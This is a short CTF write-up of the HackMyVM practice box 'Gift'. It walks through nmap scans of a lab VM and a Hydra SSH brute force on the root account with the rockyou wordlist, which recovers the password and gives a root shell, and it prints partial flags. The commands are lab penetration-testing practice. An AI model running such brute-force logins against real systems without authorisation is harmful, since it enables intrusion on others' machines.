HackMyVM - Gift | 0xatom

You can start playing there > HackMyVM

Summary

This one is a really easy box, all we’ve to do is a SSH brute force attack. This will provice us a root shell. Free points box haha. Let’s pwn it!

Enumeration/Reconnaissance

Let’s start as always with nmap.

$ ip=192.168.1.19
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 13:56 EEST
Nmap scan report for gift.zte.com.cn (192.168.1.19)
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:43:70:47 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds
$ nmap -p 22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 13:56 EEST
Nmap scan report for gift.zte.com.cn (192.168.1.19)
Host is up (0.00046s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).

port 80 just has a message:

$ curl http://$ip/

Dont Overthink. Really, Its simple.
	<!-- Trust me -->

Shell as root

I tried ton of stuff because i always overthink but in the end was just a brute force on root user:

$ hydra -l root -P /usr/share/wordlists/rockyou.txt $ip ssh

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.19:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
[22][ssh] host: 192.168.1.19   login: root   password: simple

$ ssh root@$ip
root@192.168.1.19's password: 
IM AN SSH SERVER
gift:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Let’s read the flags:

gift:~# cat root.txt | cut -c1-5
HMVty
gift:~# cat user.txt | cut -c1-5
HMV66

Free points yay! :P